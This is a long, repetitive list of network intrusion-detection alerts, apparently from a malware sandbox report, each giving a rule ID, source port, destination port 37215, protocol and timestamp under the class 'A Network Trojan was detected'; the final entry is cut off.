                SID:2835222
                Source Port:56746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991487
                SID:2829579
                Source Port:49894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660518
                SID:2829579
                Source Port:48242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165421
                SID:2829579
                Source Port:41948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184536
                SID:2829579
                Source Port:40344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412083
                SID:2829579
                Source Port:45864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164316
                SID:2835222
                Source Port:49040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324507
                SID:2829579
                Source Port:47608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366480
                SID:2835222
                Source Port:39220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646489
                SID:2829579
                Source Port:41916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645416
                SID:2829579
                Source Port:55800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804505
                SID:2835222
                Source Port:53726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662043
                SID:2835222
                Source Port:58554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419789
                SID:2829579
                Source Port:47584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985991
                SID:2829579
                Source Port:44356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.387122
                SID:2829579
                Source Port:36242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849136
                SID:2829579
                Source Port:52946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502447
                SID:2835222
                Source Port:46418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504985
                SID:2829579
                Source Port:39830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338679
                SID:2835222
                Source Port:54526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369069
                SID:2835222
                Source Port:39822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.562927
                SID:2835222
                Source Port:43140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828092
                SID:2835222
                Source Port:59966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150037
                SID:2829579
                Source Port:56960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501842
                SID:2829579
                Source Port:57282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980345
                SID:2835222
                Source Port:51748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684977
                SID:2835222
                Source Port:48862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666175
                SID:2829579
                Source Port:44938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546442
                SID:2835222
                Source Port:56600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230740
                SID:2835222
                Source Port:45532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277158
                SID:2835222
                Source Port:52166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.087948
                SID:2835222
                Source Port:39924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766660
                SID:2829579
                Source Port:38234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198985
                SID:2829579
                Source Port:42770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.075208
                SID:2829579
                Source Port:51102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667010
                SID:2829579
                Source Port:39560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503544
                SID:2829579
                Source Port:38158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807968
                SID:2829579
                Source Port:57918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941756
                SID:2829579
                Source Port:42188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915980
                SID:2829579
                Source Port:46234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765422
                SID:2835222
                Source Port:34342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944298
                SID:2835222
                Source Port:46802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734421
                SID:2829579
                Source Port:57060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421646
                SID:2835222
                Source Port:46288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661830
                SID:2835222
                Source Port:51512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661973
                SID:2835222
                Source Port:50488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940757
                SID:2835222
                Source Port:52294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472622
                SID:2829579
                Source Port:49916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980513
                SID:2835222
                Source Port:47776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916526
                SID:2835222
                Source Port:47396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997327
                SID:2829579
                Source Port:51138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941366
                SID:2835222
                Source Port:56046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915109
                SID:2835222
                Source Port:43672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293504
                SID:2829579
                Source Port:58852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502206
                SID:2835222
                Source Port:36526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152123
                SID:2835222
                Source Port:51756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662326
                SID:2829579
                Source Port:33748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143672
                SID:2835222
                Source Port:48366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519574
                SID:2829579
                Source Port:53366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017807
                SID:2835222
                Source Port:36412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.294931
                SID:2829579
                Source Port:40388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880038
                SID:2829579
                Source Port:51924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.319628
                SID:2829579
                Source Port:56376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419866
                SID:2835222
                Source Port:44324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716575
                SID:2835222
                Source Port:42390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761142
                SID:2829579
                Source Port:39664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689241
                SID:2835222
                Source Port:55364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520095
                SID:2835222
                Source Port:38790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150254
                SID:2835222
                Source Port:41738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366685
                SID:2829579
                Source Port:59394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545754
                SID:2835222
                Source Port:42322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792089
                SID:2835222
                Source Port:42292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547554
                SID:2829579
                Source Port:44790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409031
                SID:2835222
                Source Port:44044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725755
                SID:2829579
                Source Port:57860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846675
                SID:2835222
                Source Port:60490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671405
                SID:2835222
                Source Port:35076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790763
                SID:2835222
                Source Port:51828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471469
                SID:2835222
                Source Port:36360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409767
                SID:2829579
                Source Port:43874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682137
                SID:2835222
                Source Port:53272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143343
                SID:2829579
                Source Port:60934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790147
                SID:2829579
                Source Port:53342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777230
                SID:2829579
                Source Port:35486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806027
                SID:2829579
                Source Port:34710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202997
                SID:2835222
                Source Port:44438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055171
                SID:2835222
                Source Port:48336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943785
                SID:2835222
                Source Port:39054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.075299
                SID:2829579
                Source Port:60572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807074
                SID:2835222
                Source Port:36816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276609
                SID:2835222
                Source Port:53262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616454
                SID:2835222
                Source Port:41662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411391
                SID:2829579
                Source Port:45586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661155
                SID:2829579
                Source Port:48094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365918
                SID:2835222
                Source Port:40458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543335
                SID:2835222
                Source Port:40436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185321
                SID:2829579
                Source Port:38086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367886
                SID:2835222
                Source Port:58170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451018
                SID:2835222
                Source Port:53970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031338
                SID:2835222
                Source Port:48984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368293
                SID:2829579
                Source Port:39420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765617
                SID:2829579
                Source Port:57366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677223
                SID:2829579
                Source Port:40290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016396
                SID:2829579
                Source Port:49034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997354
                SID:2835222
                Source Port:34422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149713
                SID:2829579
                Source Port:32898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452551
                SID:2835222
                Source Port:46132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382949
                SID:2835222
                Source Port:36076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977998
                SID:2829579
                Source Port:57058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977448
                SID:2835222
                Source Port:52316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.405826
                SID:2829579
                Source Port:48114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683978
                SID:2835222
                Source Port:58760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546178
                SID:2829579
                Source Port:53420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644237
                SID:2829579
                Source Port:44970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.736019
                SID:2835222
                Source Port:58216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.933624
                SID:2835222
                Source Port:55320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934817
                SID:2829579
                Source Port:46934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419697
                SID:2829579
                Source Port:45892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725893
                SID:2829579
                Source Port:52006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518478
                SID:2829579
                Source Port:43308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914514
                SID:2829579
                Source Port:52444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421620
                SID:2829579
                Source Port:46492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177181
                SID:2829579
                Source Port:36068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034462
                SID:2835222
                Source Port:34654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519796
                SID:2835222
                Source Port:54222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807457
                SID:2835222
                Source Port:60842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.050659
                SID:2835222
                Source Port:44946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944695
                SID:2835222
                Source Port:39032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025397
                SID:2835222
                Source Port:43250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.406210
                SID:2835222
                Source Port:57106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185522
                SID:2835222
                Source Port:33378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383745
                SID:2835222
                Source Port:44810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916297
                SID:2829579
                Source Port:54032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881666
                SID:2829579
                Source Port:55548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325983
                SID:2835222
                Source Port:43656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.364958
                SID:2835222
                Source Port:53106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368799
                SID:2829579
                Source Port:58778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365565
                SID:2835222
                Source Port:42044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662387
                SID:2835222
                Source Port:53058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772551
                SID:2829579
                Source Port:56044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.094362
                SID:2829579
                Source Port:40832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934447
                SID:2829579
                Source Port:45414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545536
                SID:2829579
                Source Port:34878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805014
                SID:2835222
                Source Port:55894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132020
                SID:2835222
                Source Port:42644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410511
                SID:2835222
                Source Port:35008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969688
                SID:2835222
                Source Port:41072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152055
                SID:2829579
                Source Port:43324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340450
                SID:2835222
                Source Port:57774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033416
                SID:2829579
                Source Port:58108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791428
                SID:2829579
                Source Port:48742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614244
                SID:2835222
                Source Port:56058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.087308
                SID:2835222
                Source Port:48212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878634
                SID:2835222
                Source Port:60036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000687
                SID:2829579
                Source Port:51908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422109
                SID:2835222
                Source Port:50422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449173
                SID:2835222
                Source Port:53700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472915
                SID:2829579
                Source Port:50508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715659
                SID:2835222
                Source Port:56522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715180
                SID:2829579
                Source Port:44070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761807
                SID:2835222
                Source Port:50228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625172
                SID:2835222
                Source Port:41354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858976
                SID:2835222
                Source Port:59850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.996999
                SID:2835222
                Source Port:51970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184331
                SID:2829579
                Source Port:54690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179336
                SID:2829579
                Source Port:48854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021449
                SID:2829579
                Source Port:41940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012635
                SID:2835222
                Source Port:59674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.448898
                SID:2829579
                Source Port:51538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092736
                SID:2829579
                Source Port:51410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861928
                SID:2829579
                Source Port:59002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547792
                SID:2835222
                Source Port:34550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452403
                SID:2829579
                Source Port:40814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735190
                SID:2829579
                Source Port:56052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944466
                SID:2835222
                Source Port:42234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906127
                SID:2835222
                Source Port:56898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517774
                SID:2829579
                Source Port:42518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762033
                SID:2829579
                Source Port:43862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763720
                SID:2829579
                Source Port:44806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986308
                SID:2829579
                Source Port:56994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.899293
                SID:2829579
                Source Port:54502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942580
                SID:2835222
                Source Port:40806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202837
                SID:2829579
                Source Port:49346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.899265
                SID:2829579
                Source Port:37568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663033
                SID:2835222
                Source Port:58608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943190
                SID:2829579
                Source Port:57416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018861
                SID:2829579
                Source Port:60192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988969
                SID:2829579
                Source Port:42192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518411
                SID:2829579
                Source Port:57918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159250
                SID:2829579
                Source Port:43648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830010
                SID:2835222
                Source Port:53506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548560
                SID:2835222
                Source Port:57764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645291
                SID:2835222
                Source Port:39018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226367
                SID:2835222
                Source Port:41896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760217
                SID:2835222
                Source Port:51322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033511
                SID:2835222
                Source Port:33424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565849
                SID:2835222
                Source Port:56618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663781
                SID:2829579
                Source Port:59080
                Destination Port:37215
